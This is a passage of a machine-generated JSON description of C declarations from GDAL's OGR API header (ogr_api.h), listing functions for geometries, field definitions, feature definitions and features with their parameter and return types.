"return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_GetCurveGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:262:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGRBuildPolygonFromEdges", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:266:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hLinesAsCollection", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "bBestEffort", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bAutoClose", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "dfTolerance", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "peErr", "type": { "tag": ":pointer", "type": { "tag": "OGRErr" } } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGRSetGenerate_DB2_V72_BYTE_ORDER", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:273:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "bGenerate_DB2_V72_BYTE_ORDER", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGRGetGenerate_DB2_V72_BYTE_ORDER", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:276:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGRSetNonLinearGeometriesEnabledFlag", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:279:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "bFlag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGRGetNonLinearGeometriesEnabledFlag", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:280:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "OGRFieldDefnH", "location": "/usr/include/gdal/ogr_api.h:297:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRFeatureDefnH", "location": "/usr/include/gdal/ogr_api.h:299:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRFeatureH", "location": "/usr/include/gdal/ogr_api.h:301:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRStyleTableH", "location": "/usr/include/gdal/ogr_api.h:303:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "struct", "ns": 0, "name": "OGRGeomFieldDefnHS", "id": 0, "location": "/usr/include/gdal/ogr_api.h:306:16", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "OGRGeomFieldDefnH", "location": "/usr/include/gdal/ogr_api.h:306:36", "type": { "tag": ":pointer", "type": { "tag": "struct", "ns": 0, "name": "OGRGeomFieldDefnHS", "id": 0, "location": "/usr/include/gdal/ogr_api.h:306:16", "bit-size": 0, "bit-alignment": 0, "fields": [] } } }, { "tag": "function", "name": "OGR_Fld_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:311:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFieldType" } }], "return-type": { "tag": "OGRFieldDefnH" } }, { "tag": "function", "name": "OGR_Fld_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:312:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_SetName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:314:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_GetNameRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:315:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_Fld_GetType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:316:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": "OGRFieldType" } }, { "tag": "function", "name": "OGR_Fld_SetType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:317:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFieldType" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_GetSubType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:318:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": "OGRFieldSubType" } }, { "tag": "function", "name": "OGR_Fld_SetSubType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:319:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFieldSubType" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_GetJustify", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:320:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": "OGRJustification" } }, { "tag": "function", "name": "OGR_Fld_SetJustify", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:321:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRJustification" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_GetWidth", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:322:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_Fld_SetWidth", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:323:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_GetPrecision", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:324:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_Fld_SetPrecision", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:325:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_Set", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:326:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFieldType" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRJustification" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_IsIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:328:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_Fld_SetIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:329:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_IsNullable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:330:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_Fld_SetNullable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:331:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_GetDefault", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:332:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_Fld_SetDefault", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:333:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Fld_IsDefaultDriverSpecific", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:334:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GetFieldTypeName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:336:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldType" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_GetFieldSubTypeName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:337:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFieldSubType" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_AreTypeSubTypeCompatible", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:338:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRFieldType" } }, { "tag": "parameter", "name": "eSubType", "type": { "tag": "OGRFieldSubType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GFld_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:343:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "function", "name": "OGR_GFld_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:344:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_GFld_SetName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:346:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_GFld_GetNameRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:347:31", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_GFld_GetType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:349:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GFld_SetType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:350:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_GFld_GetSpatialRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:352:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "function", "name": "OGR_GFld_SetSpatialRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:353:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "parameter", "name": "hSRS", "type": { "tag": "OGRSpatialReferenceH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_GFld_IsNullable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:356:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GFld_SetNullable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:357:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_GFld_IsIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:359:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GFld_SetIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:360:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:364:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRFeatureDefnH" } }, { "tag": "function", "name": "OGR_FD_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:365:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_Release", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:366:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_GetName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:367:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_FD_GetFieldCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:368:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_GetFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:369:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRFieldDefnH" } }, { "tag": "function", "name": "OGR_FD_GetFieldIndex", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:370:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_AddFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:371:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_DeleteFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:372:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_FD_ReorderFieldDefns", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:373:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "panMap", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_FD_GetGeomType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:374:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_FD_SetGeomType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:375:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_IsGeometryIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:376:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_SetGeometryIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:377:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_IsStyleIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:378:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_SetStyleIgnored", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:379:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_Reference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:380:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_Dereference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:381:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_GetReferenceCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:382:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_GetGeomFieldCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:384:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFDefn", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_GetGeomFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:385:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "i", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "function", "name": "OGR_FD_GetGeomFieldIndex", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:387:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_FD_AddGeomFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:390:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "hGFldDefn", "type": { "tag": "OGRGeomFieldDefnH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_FD_DeleteGeomFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:392:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "iGeomField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_FD_IsSame", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:394:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFDefn", "type": { "tag": "OGRFeatureDefnH" } }, { "tag": "parameter", "name": "hOtherFDefn", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:398:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureDefnH" } }], "return-type": { "tag": "OGRFeatureH" } }, { "tag": "function", "name": "OGR_F_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:399:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetDefnRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:400:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRFeatureDefnH" } }, { "tag": "function", "name": "OGR_F_SetGeometryDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:402:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_SetGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:403:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_GetGeometryRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:404:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_F_StealGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:405:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_F_Clone", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:406:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRFeatureH" } }, { "tag": "function", "name": "OGR_F_Equal", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:407:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_GetFieldCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:409:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": 